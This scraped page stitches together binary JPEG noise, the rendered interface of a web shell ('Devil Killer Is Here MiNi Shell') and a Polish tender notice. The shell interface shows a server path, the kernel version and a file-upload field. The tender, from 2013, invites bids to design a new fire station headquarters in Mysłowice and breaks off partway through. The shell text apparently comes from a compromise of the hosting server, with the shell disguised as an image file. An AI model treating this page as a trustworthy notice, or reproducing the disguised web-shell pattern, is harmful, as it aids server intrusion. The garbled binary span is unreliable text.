JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131213/272217-N-2013.html

<p class="kh_header"><b>Mysłowice: Opracowanie kompleksowego wielobranżowego projektu budowlanego i projektu budowlano - wykonawczego wraz z przedmiarem robót i kosztorysem inwestorskim oraz specyfikacją techniczną wykonania i odbioru robót budowlanych, na budowę Nowej Siedziby Komendy Miejskiej i Jednostki Ratowniczo Gaśniczej Państwowej Straży Pożarnej w Mysłowicach przy ul. Mikołowskiej, 
wraz z uzyskaniem pozwolenia na budowę</b><br>
<b>Numer ogłoszenia: 272217 - 2013; data zamieszczenia: 13.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Miejska Państwowej Straży Pożarnej w Mysłowicach , ul. Strażacka 7, 41-400 Mysłowice, woj. śląskie, tel. 32 3160030, faks 32 3160039.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> myslowice.kmpsp.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie kompleksowego wielobranżowego projektu budowlanego i projektu budowlano - wykonawczego wraz z przedmiarem robót i kosztorysem inwestorskim oraz specyfikacją techniczną wykonania i odbioru robót budowlanych, na budowę Nowej Siedziby Komendy Miejskiej i Jednostki Ratowniczo Gaśniczej Państwowej Straży Pożarnej w Mysłowicach przy ul. Mikołowskiej, 
wraz z uzyskaniem pozwolenia na budowę.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Opis przedmiotu zamówienia.
1.1.	 Przedmiotem zamówienia jest zadanie pod nazwą: Opracowanie kompleksowego wielobranżowego projektu budowlanego i projektu budowlano - wykonawczego wraz z przedmiarem robót i kosztorysem inwestorskim oraz specyfikacją techniczną wykonania i odbioru robót budowlanych, na budowę Nowej Siedziby Komendy Miejskiej i Jednostki Ratowniczo Gaśniczej Państwowej Straży Pożarnej w Mysłowicach przy ul. Mikołowskiej, wraz z uzyskaniem pozwolenia na budowę.
1.2.	 Zakres zamówienia obejmuje:
A.	Opracowanie koncepcji funkcjonalno - przestrzennej wraz z wizualizacją, która wymaga uzgodnienia i zatwierdzenia przez zamawiającego w formie pisemnej.
B.	Opracowanie projektu budowlanego z uzyskaniem pozwolenia na budowę w tym dla zjazdów z dróg publicznych oraz zgodą na połączenie działki budowlanej z drogą publiczną.
C.	Opracowanie branżowych projektów budowlano - wykonawczych w następujących branżach:
1.	architektura wraz z zagospodarowaniem terenu, 
2.	konstrukcje, 
3.	instalacje elektryczne, zawierające:
-	zasilania podstawowego i awaryjnego wraz z UPS
-	energooszczędnego oświetlenia podstawowego
-	energooszczędnego oświetlenia  awaryjno - ewakuacyjnego
-	energooszczędnego oświetlenia terenu
-	odgromowej
-	telefonicznej,
-	informatycznej,
-	antenowej na potrzeby sieci łączności radiowej dla Stanowiska Kierowania Komendanta Miejskiego i Miejskiego Centrum Zarządzania Kryzysowego,
-	przeciwporażeniowej,
-	telewizji przemysłowej z możliwością rejestrowania
-	systemu kontroli dostępu do pomieszczeń,
-	systemu powiadamiania strażaków o wyjeździe do akcji (optyczno - akustyczny) z możliwością sterowania drzwiami do ześlizgów,
-	zdalnego sterowania bram garażowych i wjazdowych,
-	antenowej RTV,
-	nagłośnienia wewnętrznego i zewnętrznego obiektu,
-	sygnalizacji drogowej wyjazdów alarmowych sterowanej ze Stanowiska Kierowania Komendanta Miejskiego,
-	automatycznych urządzeń rozłączających dla pojazdów pożarniczych,
-	światłowodowej na potrzeby systemu powiadamiania ratunkowego OST 112 do serwerowni i Stanowiska Kierowania Komendanta Miejskiego,
-	instalacja systemu antyoblodzeniowego rynien i rur spustowych;
4.	instalacji sanitarnej,
-	C.W.U i woda zimna,
-	Kanalizacja sanitarna i deszczowa,
-	C.O.
-	zastosowanie źródeł energii odnawialnej - instalacja fotowoltaiczna i pompa ciepła,
-	system odciągu spalin w garażach, warsztacie i stanowisku naprawczym,
-	klimatyzacji centralnej,
-	wentylacji i rekuperacji, 
-	sprężonego powietrza w garażach i warsztacie,
-	zaworu hydrantowego wewnątrz garażu i przy placu ćwiczeń umożliwiających tankowanie w wodę pojazdów pożarniczych (niezależny licznik od C.W.U.),
-	wewnętrznej instalacji gazu wraz z kotłownią.
5.	projekty niezbędnych sieci i przyłączy do sieci zewnętrznych:
-	przyłącze wod. - kanalizacyjnych,
-	przyłącze gazu,
-	przyłącze do sieci elektroenergetycznej, telefonicznej, światłowodowej.
Wykonawca uzyska warunki techniczne podłączeń do sieci zewnętrznych oraz zapewnia, że w razie konieczności niezwłocznie wykonana projekty przyłączy na odcinku od granicy działki do miejsca wskazanego przez dostawcę mediów. W powyższym zakresie wykonawca uzyska dla wykonanych projektów stosowne uzgodnienia i pozwolenia.
1.	Opracowanie przedmiarów robót i kosztorysów inwestorskich do wszystkich branż projektowych (wersja papierowa i elektroniczna w formatach pdf, ath),
2.	Wykonanie specyfikacji technicznej wykonania i odbioru robót budowlanych,
3.	Zakres opracowań:
-	Koncepcja funkcjonalno - przestrzenna wraz z wizualizacją - 3 egz. w formie papierowej, oraz 1 egz. na płycie CD/DVD w formatach doc, dwg oraz pdf,
-	projekty budowlane dla potrzeb uzyskania pozwolenia na budowę 5 egz. w formie papierowej oraz 1 egz. na płycie CD/DVD w formatach doc, dwg oraz pdf,
-	projekty budowlano - wykonawczy dla każdej branży - 4 egz. w formie papierowej oraz 1 egz. na płycie CD/DVD w formatach doc, dwg oraz pdf,
-	przedmiary robót w podziale na poszczególne branże po 4 egz. w formie papierowej oraz 1 egz. na płycie CD/DVD w formacie możliwym do odczytania przez program kosztorysowy 
-	kosztorys inwestorski zbiorczy z podziałem na poszczególne branże 2 egz. w formie papierowej oraz 1 egz. na płycie CD/DVD w formacie możliwym do odczytania przez program kosztorysowy,
-	specyfikacje techniczne wykonania i odbioru robót 4 egz. w formie papierowej oraz 1 egz. na płycie CD/DVD,
Założenia architektoniczne.
Dane o planowanym zakresie rzeczowym inwestycji.
Inwestycja obejmuje budowę budynku głównego siedziby Komendy Miejskiej oraz Jednostki Ratowniczo - Gaśniczej Państwowej Straży Pożarnej w Mysłowicach, zagospodarowanie przyległego terenu polegającego na wykonaniu wewnętrznego układu komunikacyjnego, stanowiska do przeglądu i mycia samochodów, parkingów, placu ćwiczeń, wieży ćwiczeń, ogrodzenia terenu, oraz powiązania wewnętrznego układu komunikacyjnego z miejskim układem komunikacyjnym.
W nowym obiekcie powstanie 7 podwójnych stanowisk garażowych dla pojazdów ratowniczych, część socjalno-biurowa, cześć logistyczna, część garażowo-warsztatowa, pomieszczenia załogi JRG z zapleczem, Stanowisko Kierowania Komendanta Miejskiego wraz z całą infrastrukturą techniczną oraz pozostałe obiekty zagospodarowania terenu i małej architektury. 
Poniżej przedstawiono zestawienie pomieszczeń i powierzchni użytkowej oraz zagospodarowania terenu opracowane w oparciu o Wskazania do projektowania obiektów strażnic PSP wydane przez Komendę Główną Państwowej Straży Pożarnej w Warszawie. 
Szacunkowe dane ogólne
-	powierzchnia działki w Mysłowicach ul. Mikołowska                14 569 m2
-	powierzchnia użytkowa budynku                                         3 120 m2
-	powierzchnia zabudowy                                                    2 000 m2
-	kubatura budynku                                                           11 800 m3
-	powierzchnia placu manewrowego                                      3 000 m2
-	powierzchnia pozostałych powierzchnia utwardzonych: 
chodniki, parkingi, drogi dojazdowe
-	powierzchnia zieleni					  1 000 m2
-	wieża  ćwiczeń 						     220 m2 
-	plac ćwiczeń                                  				     300 m2
Zestawienie pomieszczeń i szacunkowej powierzchni użytkowej
-	Stanowisko Kierowania Komendanta Miejskiego + zaplecze			76 m2
-	Centrum Zarządzania Kryzysowego   						60 m2
-	Gabinet Komendanta Miejskiego 						30 m2
-	Gabinet Zastępcy Komendanta Miejskiego 					22 m2
-	Sekretariat									37 m2
-	Zaplecze (aneks kuchenny + WC)						12 m2
-	Pokój głównego księgowego  							16 m2
-	Kasa									 	 8 m2
-	8 pokoi biurowych dla KM i JRG					 	            112 m2
-	Archiwum									25 m2
-	Gabinet Dowódcy JRG 								25 m2
-	Gabinet Zastępcy Dowódcy JRG 						20 m2
-	Pokój dowódcy zmiany 								16 m2
-	Pomieszczenie podoficera JRG 							15 m2
-	Pomieszczenie dyżurnego							10 m2
-	Sypialnia dowódcy zmiany 							15 m2
-	6 sypialni 4 osobowych (1 węzeł sanitarny dla 2 sypialni) 	           	            100 m2
-	3 pokoje (z węzłem sanitarnym) dla dodatkowego zakwaterowania 
strażaków   									84 m2
-	Jadalnia z zapleczem kuchennym						60 m2
-	Węzeł sanitarny + umywalnia 							18 m2
-	4 WC ogólnodostępne 								36 m2
-	Sala operacyjno - wykładowa z zapleczem  					68 m2
-	Sala telewizyjna 								30 m2
-	Sala pamięci  									40 m2
-	Siłownia 									30 m2
-	2 pomieszczenia gospodarcze ogólne 						16 m2
-	3 szatnie czyste 								60 m2
-	4 szatnie brudne 								80 m2
-	Pomieszczenie suszarni odzieży i obuwia					20 m2
-	Pomieszczenie pralni i czyszczenia obuwia 					40 m2
-	Palarnia									15 m2
-	Serwerownia									16 m2
-	Wentylatornia 									30 m2
-	Agregatownia 									26 m2
-	Kotłownia 									42 m2
-	Wężownia 									18 m2
-	Stacja obsługi sprzętu oddechowego i ubrań gazoszczelnych 			60 m2
-	Hole + korytarze 						    	            288 m2
-	Magazyn paliw i smarów 							20 m2
-	Magazyn warsztatu naprawczego 						25 m2
-	Magazyn sorbentów i neutralizatorów 						25 m2
-	Magazyn środków pianotwórczych 				 		30 m2
-	Magazyn sprzętu gaśniczego 							60 m2
-	Magazyn P-GAZ 								15 m2
-	Magazyn proszków gaśniczych 							25 m2
-	Magazyn pościelowy 								20 m2
-	Magazyn mundurowy 								20 m2
-	Magazyn wyposażenia osobistego strażaków 					20 m2
-	4 magazynki 									32 m2
-	Magazyn przeciwpowodziowy                                                                              100 m2
-	Stanowisko do mycia i odkażania pojazdów 					80 m2
-	Stanowisko naprawcze z kanałem i prowadnicy podsufitowej z wyciągarką	80 m2
-	Warsztat naprawczy 								45 m2
-	7 stanowisk garażowych podwójnych a 55m2/stanowisko 	            	           770 m2
-	Pomieszczenie przewidziane do zabudowy komory rozgorzeniowej 
z zapleczem 				                  			           120 m2
Projektowany budynek strażnicy musi spełniać wszystkie funkcje wymagane dla obiektów strażnic, a mianowicie:
w zakresie operacyjnym:
-	garażowania pojazdów służb ratowniczych,
-	przechowywania sprzętu przeznaczonego do działań,
-	przechowywania sprzętu ochrony indywidualnej,
-	przyjmowanie zgłoszeń o zdarzeniach, dysponowanie sił i środków oraz koordynacja działań,
-	zaplecze socjalne dla załogi (strażaków, ratowników i obsługi).
w zakresie logistycznym:
-	magazynowanie rezerwowego sprzętu do działań,
-	naprawy i konserwacja sprzętu oraz drobnych napraw pojazdów,
-	ładowanie butli powietrznych i konserwacja sprzętu ochrony dróg oddechowych,
-	magazynowanie innego sprzętu i materiałów,
-	magazynowanie środków gaśniczych,
-	magazynowanie sorbentów i neutralizatorów,
-	magazynowanie sprzętu przeznaczonego do działań przeciwpowodziowych,
-	magazynowanie materiałów pędnych i smarów.
w zakresie innych zadań:
-	możliwość realizacji szkolenia doskonalącego dla strażaków z całego województwa Śląskiego 
w komorze rozgorzeniowej,
-	możliwość organizacji szkoleń teoretycznych,
-	możliwość organizacji szkoleń, ćwiczeń praktycznych ze sprzętem,
-	podnoszenie sprawności fizycznej załogi,
-	prawidłowej realizacji zadań administracyjno - biurowych.
w zakresie techniczno - funkcjonalnym:
-	zapewnienia zapasowego źródła zasilania w energię elektryczną, 
-	zapewnienia infrastruktury teleinformatycznej z zapleczem do obsługi SK KM i MCZK,
-	przyłączenia do sieci ogólnych elektrycznych, telekomunikacyjnych w tym światłowodowej na potrzeby systemu powiadamiania ratunkowego OST 112, wodnych, kanalizacyjnych, 
-	wyposażenia w niezbędne instalacje zaprojektowane zgodnie z obowiązującymi przepisami, wymaganiami oraz wytycznymi SANEPID-u i wymogami ochrony przeciwpożarowej.
Założenia dla pomieszczeń przygotowywanych do zabudowy komory rozgorzeniowej.
Pomieszczenia - wielkość całkowita pomieszczeń do ćwiczeń z pomieszczeniem sterującym, socjalnym i szkolenia wstępnego (zaplecza) dla 8 osób - ok 120m2. W wyznaczonym obszarze przeznaczonym do ćwiczeń powinny się znajdować następujące pomieszczenia - pokoje:
-	korytarz z zejściem do piwnicy,
-	kuchnia,
-	pokój sypialny, 
-	pokój dzienny ze schodami do góry.
Poszczególne pomieszczenia mają być wyposażone w następujące urządzenia do symulacji pożarów w zróżnicowanych konfiguracjach.
-	korytarz: pożar schodów prowadzących do piwnicy, pożar w piwnicy (zakręcenie zaworu gazowego), dodatkowo flash-over,
-	kuchnia: pożar kuchni gazowej, wyrzut i spalanie powierzchniowe oleju, dodatkowo 
w pomieszczeniu zjawisko rozgorzenia flash-over,
-	pokój sypialny: pożar łóżka (lub elementów wyposażenia), dodatkowo w pomieszczeniu zjawisko rozgorzenia flash-over, z otworem okiennym zaopatrzonym w okiennice, opcjonalnie wyposażone w sterowanie do otwierania mechanicznego.
-	pokój dzienny: pożar schodów prowadzących do góry, dodatkowo w pomieszczeniu zjawisko rozgorzenia flash-over, z otworem okiennym zaopatrzonym w okiennice, opcjonalnie wyposażone w sterowanie do otwierania mechanicznego.
Ogólne warunki i wymagania dla pomieszczeń, w których znajdują się symulatory:
-	temperatura w Stefach płomienia w warstwie podsufitowej ok. 900 stopni Celcjusza, zastosowanie okładzin ścian i sufitów w celu ochrony przed wys. temperaturą,
-	obiekt narażony na dużą wilgoć oraz podawanie wody w różnych konfiguracjach od prądów rozproszonych po zwarte,
-	powinny być zainstalowane instalacje: odprowadzające wodę (kanalizacja wewnętrzna) z separatorem, głośnikową, elektryczną (bezpieczna na 24 Volt, lub zasilana bateryjnie). 
-	poziom podłogi umożliwiający odprowadzenie nadmiaru wody do kanalizacji,
-	wentylacja grawitacyjna z ręcznym sterowaniem w każdym pomieszczeniu, umożliwiająca szybkie przewietrzenie pomieszczenia dostosowana do wysokich temperatur  odpowiedniej wydajności
-	w pomieszczeniach należy utrzymać minimalną temperaturę ok. 5-6 stopni Celcjusza w sezonie zimowym - ogrzewanie podłogowe lub inne alternatywne
-	należy zapewnić instalację głośnikową zewnętrzną (podobnie jak w kontenerowych trenażerach) 
-	należy zaplanować w jednym z pomieszczeń odrębne stanowisko przygotowane do spalania materiałów stałych ( np. płyty wiórowe, drewno itp.)  
-	należy przewidzieć montaż termopar w celu wizualizacji temperatur w poszczególnych pomieszczeniach, w strefie podsufitowej i przyziemnej ( minimum w 2 pomieszczeniach  jedno z oknem i drugie bez).
Założenia techniczne do wykonania komory
-	w związku z brakiem polskich norm bezpieczeństwa w zakresie przeprowadzania ćwiczeń w trenażerach rozgorzeniowych należy przy realizacji zadania zastosować wytyczne zawarte w niemieckiej normie DIN 14097 dotyczącej instalacji treningowych pożaru,
-	zastosować urządzenia do nadzoru i bezpieczeństwa,
-	materiał palny gaz; propan dostarczany poprzez instalację zasilaną lokalnym magazynem gazu ( butle, zbiorniki gazowe).
Warunki budowlane dot. pomieszczeń ćwiczeń.
Obiekt obejmujący pomieszczenia do ćwiczeń powinien przylegać do budynku strażnicy i być zabezpieczony przed niekorzystnymi warunkami eksploatacji  (tj. wysoka temperatura, woda).
-	obiekt jednokondygnacyjny o powierzchni pomieszczeń do ćwiczeń (tj. o podwyższonych parametrach temperatury) ok. 50 - 60 m2,
-	ławy i ściany fundamentowe - monolityczne z betonu zbrojonego, izolacja przeciwwilgociowa,
-	ściany zewnętrzne monolityczne z betonu zbrojonego lub bloczki betonowe nietynkowane,
-	ściany wewnętrzne z bloczków betonowych nietynkowanych,
-	stropy monolityczne z betonu zbrojonego,
-	dach konstrukcja żelbetowa (podciągi), płyty żelbetowe, izolacja termiczna, pokrycie (papa lub blacha stalowa),
-	posadzka płyta betonowa zbrojona siatkami o nawierzchni szlichta betonowa w wyprofilowanymi spadkami do otworów kanalizacji (izolacja przeciwwilgociowa od gruntu),
-	w jednym z pomieszczeń należy wykonać otwór w warstwie podsufitowej symulujący przebicie dachowe ( w tym miejscu należy umieścić jedna z termopar dla obserwacji tempa wychładzania pomieszczenia). Otwór zamykany i otwierany mechanicznie.
W związku ze specyfiką zadania budowy komory rozgorzeniowej i brakiem podobnych rozwiązań w kraju, zamawiający wymaga współpracy na etapie projektowania z firmą o odpowiednim doświadczeniu w realizacji podobnych zadań w europie.
Dokumentacja projektowa powinna uwzględniać obowiązujące akty prawne, w tym między innymi:
-	wytycznych Komendanta głównego do projektowania strażnic, dla Komend Powiatowych / Miejskich PSP kategorii IV,
-	ustawy z dn. 7 lipca 1994 prawo budowlane (tj. Dz. U. z 2010 r. Nr 243, poz. 1623, z późniejszymi zmianami), 
-	ustawy z dn. 27 marca 2003 (Dz. U. z 2012r. poz. 647 z późniejszymi zmianami) o planowaniu i zagospodarowaniu przestrzennym 
-	rozporządzeniu ministra infrastruktury z dn. 12 kwietnia 2002 (Dz. U. nr 75 poz. 690 z późniejszymi zmianami) w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie,
-	rozporządzeniu ministra spraw wewnętrznych i administracji z dnia 16 września 2008 (Dz. U. nr 180 poz. 1115) w sprawie szczegółowych warunków BHP strażaków PSP,
-	rozporządzeniu ministra spraw wewnętrznych i administracji z dnia 26 lipca 2006 (Dz. U. nr 143 poz.1037) w sprawie ramowej organizacji komendy wojewódzkiej i powiatowej (miejskiej) PSP, 
-	rozporządzeniu ministra spraw wewnętrznych i administracji z dnia 7 czerwca 2009 (Dz. U. nr 109 poz.719) w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów,
-	rozporządzeniu ministra spraw wewnętrznych i administracji z dnia 24 lipca 2009 (Dz. U. nr 124 poz.1030) w sprawie przeciwpożarowego zaopatrzenia w wodę oraz dróg pożarowych,
-	rozporządzeniu ministra spraw wewnętrznych i administracji z dnia 16 czerwca 2003 (Dz. U. nr 82 poz.895 z późniejszymi zmianami) w sprawie uzgadniania projektu budowlanego pod względem ochrony przeciwpożarowej),
-	Polskie Normy,
-	oraz innych obowiązujących przepisów.
UWAGA: Zamawiający do prac projektowych udostępni:
-	mapę do celów projektowych,
-	zapewnienie o możliwości dostawy mediów,
-	opinię geotechniczną gruntu,
-	decyzje o warunkach zabudowy.
Powyższy opis przedmiotu Zamówienia stanowi zbiór wytycznych i standardów opisujących zasady, jakimi należy się kierować przy projektowaniu przedmiotowej strażnicy. Powyższy opis nie zastępuje obowiązujących aktów prawnych w tej mierze, lecz stanowi jedynie uzupełnienie o niektóre elementy charakterystyczne dla planowanej inwestycji. Żadne zapisy niniejszego opracowania nie zwalniają projektanta z odpowiedzialności za poprawność i kompletność dokumentacji projektowej i obowiązku stosowania obowiązujących przepisów.
Projektant w dniu uregulowania należności za projekt złoży oświadczenie o przeniesieniu wszelkich autorskich praw majątkowych na zamawiającego wraz z prawem dokonywania zmian w projekcie przez uprawnionego projektanta.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 180.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.1.	Wykonawca jest zobowiązany do wniesienia wadium w wysokości 6 000,- PLN (słownie: sześć tysięcy złotych 00/100).
1.2.	 Wadium może być wniesione w jednej lub kilku następujących formach:
-	pieniądzu,
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-	gwarancjach bankowych,
-	gwarancjach ubezpieczeniowych,
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dnia9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 
z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. nr 96, poz. 620).
1.3.	 Wadium wnoszone w formie pieniężnej należy wpłacić wyłącznie przelewem na rachunek bankowy: Komenda Miejska Państwowej Straży Pożarnej w Mysłowicach - Bank ING, nr 23105012141000002404615144. Wadium musi znajdować się na koncie Zamawiającego 
w terminie określonym uPzp, przy czym wykonawca poprzez załączenie do składanej oferty dowodu wpłaty wykazuje Zamawiającemu, że wpłacenie nastąpiło w czasie niezbędnym do spełnienia wcześniej określonego wymogu.
1.4.	 Oryginał wadium, wniesionego w formie niepieniężnej łącznie z pisemną dyspozycją wykonawcy o wyłączeniu tegoż dokumentu z oferty po zaistnieniu podstaw do zwrotu wadium, należy dołączyć do oferty.
1.5.	 Wadium wniesione w innej formie niż w pieniądzu winno zawierać bezwarunkowe 
i nieodwołalne zobowiązanie podmiotu udzielającego gwarancji lub poręczenia wypłaty kwoty wadium na każde żądanie Zamawiającego w wypadkach wymienionych w art. 46 ust. 4a i 5 ustawy, przy czym warunki automatycznego i całkowitego wygaśnięcia wadium wniesionego w formie niepieniężnej nie mogą być sprzeczne z ustawą Prawo zamówień publicznych, bowiem w sytuacji wspomnianej sprzeczności z ustawą Prawo zamówień publicznych wadium nie będzie zabezpieczać oferty w sposób prawem przewidziany.
1.6.	 Wadium wnoszone w pieniądzu zachowuje ważność przez cały okres jego przechowywania na rachunku bankowym. Wadium wnoszone w formie niepieniężnej musi być ważne co najmniej od dnia, w którym przypada termin składania ofert, do dnia, w którym upływa termin związania ofertą (jeżeli przypada na dzień ustawowo wolny od pracy, to do pierwszego dnia następującego po dniu ustawowo wolnym od pracy).
1.7.	 Zamawiający zatrzyma wadium wraz z odsetkami w przypadku zaistnienia okoliczności, 
o których mowa w art. 46 ust. 4a i 5 ustawy.
1.8.	 Zwrot, a także ponowne wniesienie wadium następuje według przepisów ustawy Prawo zamówień publicznych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca wykazuje spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
